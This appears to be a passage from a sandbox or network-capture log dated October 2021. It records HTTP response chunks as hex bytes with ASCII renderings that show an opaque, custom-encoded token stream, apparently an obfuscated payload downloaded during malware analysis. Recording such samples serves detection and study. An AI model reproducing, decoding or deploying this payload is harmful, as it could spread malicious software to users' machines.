                                                                                                                          2021-10-29 15:07:02 UTC2647INData Raw: 74 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 59 45 20 78 20 52 59 20 78 20 74 59 20 78 20 52 51 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 4b 6b 20 78 20 74 78 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 59 45 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 74
                                                                                                                          Data Ascii: t x ko x kO x QQ x OxQ x Yt x OxR x Qx x kk x tk x Ooo x kK x kt x kR x OOR x Qk x YO x tK x YE x RY x tY x RQ x RR x ko x Yx x kR x Kk x kY x to x tK x OOk x kQ x Yx x kR x Ooo x QQ x Kk x tx x OxQ x Qx x OxQ x Oxk x OOt x Qt x kk x ko x YE x kK x kt x t
                                                                                                                          2021-10-29 15:07:02 UTC2649INData Raw: 6f 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 6b 74 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 52 59 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20
                                                                                                                          Data Ascii: o x OOo x Qk x kt x kY x RY x RY x tE x tE x RR x ko x Yx x kR x Kk x kK x kt x Yt x Oxt x Oxx x kt x Oox x Oxk x kE x tO x tx x OOt x Qx x tO x Oox x Oxk x kR x OOQ x RY x RY x kR x RY x tx x to x Qx x kk x ko x RQ x QQ x OxQ x Oxk x Yx x Qx x kR x ko x
                                                                                                                          2021-10-29 15:07:02 UTC2650INData Raw: 20 4b 51 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 74 4f 20 78 20 51 74 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 6b 4b 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 74 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 51 74 20 78 20 4b 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 59 78 20 78 20 74 78 20 78 20 4f 4f 59
                                                                                                                          Data Ascii: KQ x Qk x tO x kR x tO x Qt x kt x Oox x Oxk x kK x OxQ x tx x OOR x Qx x kR x QQ x RY x RY x tO x kY x Rt x kK x tO x Yt x OxR x Qt x KQ x tK x Oxk x QQ x Yx x Yt x KQ x QQ x OxQ x tk x Oxk x RY x RY x RR x QQ x RY x Oxt x Oox x OOk x kQ x Yx x tx x OOY
                                                                                                                          2021-10-29 15:07:02 UTC2651INData Raw: 20 51 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 4f 6f 4f 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 74 6f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 51 6b 20 78 20 59 78 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 52 20 78 20 6b 4b 20 78 20
                                                                                                                          Data Ascii: Qk x Yx x Qx x OOo x Qk x tO x kR x kK x Oxx x to x tK x OOo x Qk x OxQ x Oxx x kk x RY x RY x Rt x OOE x RY x KQ x Oxx x OoO x Qt x kk x ko x Oxk x kY x to x tK x OOo x Oxx x OxQ x tx x Kk x Qx x kR x RR x OoO x Qk x Yx x Qx x OOo x Qk x tO x kR x kK x
                                                                                                                          2021-10-29 15:07:02 UTC2653INData Raw: 20 4f 6f 6f 20 78 20 74 74 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20
                                                                                                                          Data Ascii: Ooo x tt x Oxk x tk x OOt x kQ x kk x RR x Ooo x Qt x tO x Yt x Kk x RY x RY x RR x OOE x RY x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x tK x Oxk x Qk x kt x Yt x Kk x Qx x kR x ko x OOO x QQ x OxQ x kR x OxK x Qx x RY x RY x RY x OOE x RY x RR x tx
                                                                                                                          2021-10-29 15:07:02 UTC2654INData Raw: 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 6b 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 59 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 6f 6f 20 78 20 6b
                                                                                                                          Data Ascii: RY x RY x RR x tk x RY x Oxk x tk x Oxk x Oxx x RQ x tk x KQ x QQ x OOx x tk x OOk x QQ x OxE x Rt x Yt x RY x kY x Oox x OOk x kQ x kt x ko x Rk x Oxx x kk x tK x Ooo x Qk x YO x tK x kk x RY x tx x OOY x RR x ko x Yx x kR x Kk x kY x YO x Oxk x Ooo x k
                                                                                                                          2021-10-29 15:07:02 UTC2655INData Raw: 52 59 20 78 20 52 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 59 78 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 6b 59 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 6b 74 20 78 20 59 45 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 74 6b 20 78 20 59 45 20 78 20 51
                                                                                                                          Data Ascii: RY x RQ x tK x Oxk x Qx x Yx x Oxk x OOt x kY x tO x tx x OOo x Qk x OOx x kO x RY x RY x kx x YR x RY x ko x Yx x kR x Kk x kO x Yx x Oox x OOo x Qx x kt x YE x Kk x kY x OxQ x kR x OxR x Oxx x RY x RR x Oxx x RY x kY x Oxx x Oxk x Oxx x tx x tk x YE x Q
                                                                                                                          2021-10-29 15:07:02 UTC2657INData Raw: 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 4b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 51 78 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 78 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20
                                                                                                                          Data Ascii: x YE x Oxt x Qk x YO x QQ x RY x OoO x RY x RR x tx x Qk x OxQ x ko x kO x kQ x kt x Oxk x OOt x Oxx x RY x RY x RY x Oxt x OOQ x tx x tK x Qk x OOx x Qx x OxK x Qk x tO x Oxk x Oxt x kQ x kk x ko x Oxk x kY x OxQ x kR x OxR x Oxx x RY x RY x RY x OOR x
                                                                                                                          2021-10-29 15:07:02 UTC2658INData Raw: 20 4f 78 51 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 6b 59 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4b 51 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 4f 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78
                                                                                                                          Data Ascii: OxQ x Yt x OxR x Oxx x kk x tt x RY x RY x Rk x tE x RR x ko x Yx x kR x Kk x kK x kt x kR x OOt x Oxx x kY x Oxk x Kk x Qx x kt x KQ x Rk x Qk x YO x kR x OOt x Oxx x RY x RY x RY x ko x kO x tx x to x Qx x kk x ko x kO x kQ x kk x tK x Oxk x Qk x OOx x
                                                                                                                          2021-10-29 15:07:02 UTC2659INData Raw: 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 78 20 78 20 4b 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 51 74 20 78 20 6b 74 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52
                                                                                                                          Data Ascii: x Kk x Qx x kY x ko x OOo x kQ x kt x Oox x OOk x Qx x KQ x RR x OxK x QQ x OxQ x tx x OOR x kR x OOQ x RY x RY x OoO x OOQ x RR x tx x Qk x OOx x kR x OOR x kO x Yx x OxK x OOo x Qk x tO x ko x kk x Qt x kt x YE x Oxt x Qk x YO x Oxx x Ooo x RY x RY x R
                                                                                                                          2021-10-29 15:07:02 UTC2661INData Raw: 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 78 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 52 6b 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 6f 4f 20 78 20 74 52 20 78 20
                                                                                                                          Data Ascii: x Oxk x tk x Oxk x Oxx x tx x ko x Oxk x OxO x to x ko x Rk x Qk x Yx x Oox x OOk x QQ x OxE x RY x RY x Qt x OOQ x tx x to x Qx x kk x ko x RQ x Qx x kk x Qx x OOo x kQ x Yx x kR x Rk x kQ x kk x RR x Ooo x RY x RQ x Oxx x RQ x kE x kK x tt x OoO x tR x
                                                                                                                          2021-10-29 15:07:02 UTC2662INData Raw: 20 4f 78 51 20 78 20 6b 52 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4b 6b 20 78 20 6b 52 20 78 20 74 4f 20 78 20 59 74 20 78 20 6b 4b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 59 20 78 20 4f 78 4b 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 51 20 78 20
                                                                                                                          Data Ascii: OxQ x kR x Yx x Qx x kk x tK x Kk x kR x tO x Yt x kK x Qx x kt x Oox x OxQ x RY x RY x RY x KE x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kY x Yx x kR x OoO x Oxx x OxQ x Oxk x OxR x Qx x kY x OxK x OxK x Qk x OxQ x ko x OOY x Qx x kO x RY x RY x KQ x
                                                                                                                          2021-10-29 15:07:02 UTC2663INData Raw: 51 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 4f 78 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20
                                                                                                                          Data Ascii: Q x Oxk x OOY x Qx x kR x QQ x RY x RY x RY x OOO x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x ko x Oxk x ko x kk x OxK x kk x RY x RY x OOY x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx
                                                                                                                          2021-10-29 15:07:02 UTC2665INData Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20
                                                                                                                          Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                                                                                          2021-10-29 15:07:02 UTC2666INData Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4b 51 20 78 20 52
                                                                                                                          Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x RY x RY x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x to x OxE x RY x RY x RY x Rt x KQ x R
                                                                                                                          2021-10-29 15:07:02 UTC2667INData Raw: 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 4f 6f 6f 20 78 20 74 52 20 78 20 4f 6f 6f 20 78 20 4f 78 6f 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 6b 6b 20 78 20 6b 45 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 59 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 6b 78 20 78 20 4f 4f 6b 20 78 20 59 45 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4f 6f 78 20 78 20 4b 74 20 78 20 6b 78 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 74 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 6f 4f 20 78 20 59 45
                                                                                                                          Data Ascii: x kK x tt x OOQ x OOY x Ooo x tR x Ooo x Oxo x OOK x OxO x Oox x tE x kk x kE x Oxk x OOO x OxY x kK x Oxt x OOE x YK x OOO x YO x OOk x kx x OOk x YE x KE x OOk x Oox x Kt x kx x tR x OxK x OOR x tR x Kt x KQ x OOt x tR x Rt x OxK x OOO x OOK x OoO x YE
                                                                                                                          2021-10-29 15:07:02 UTC2669INData Raw: 20 4f 4f 52 20 78 20 59 59 20 78 20 52 51 20 78 20 4f 78 4b 20 78 20 4f 78 78 20 78 20 74 59 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 74 51 20 78 20 6b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 45 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 59 4b 20 78 20 4b 74 20 78 20 74 6f 20 78 20 59 52 20 78 20 59 52 20 78 20 4f 4f 74 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 74 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 74 4f 20 78 20 4f 78 59 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 4f 4f 6b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 78 51 20 78 20 59 4b 20 78 20 4f 4f 74 20 78 20 59 59 20 78 20 4f 78 59 20 78 20 4b 51 20 78
                                                                                                                          Data Ascii: OOR x YY x RQ x OxK x Oxx x tY x kt x OxY x tK x tQ x kE x OOK x OOE x OxR x OxO x YR x KE x Kt x OOx x YK x Kt x to x YR x YR x OOt x tO x Kk x OOk x Kt x kt x Yo x OOY x tY x tO x OxY x OOk x tR x OxQ x OOk x OOO x YK x OxQ x YK x OOt x YY x OxY x KQ x
                                                                                                                          2021-10-29 15:07:02 UTC2670INData Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20
                                                                                                                          Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                                                                                          2021-10-29 15:07:02 UTC2671INData Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59
                                                                                                                          Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
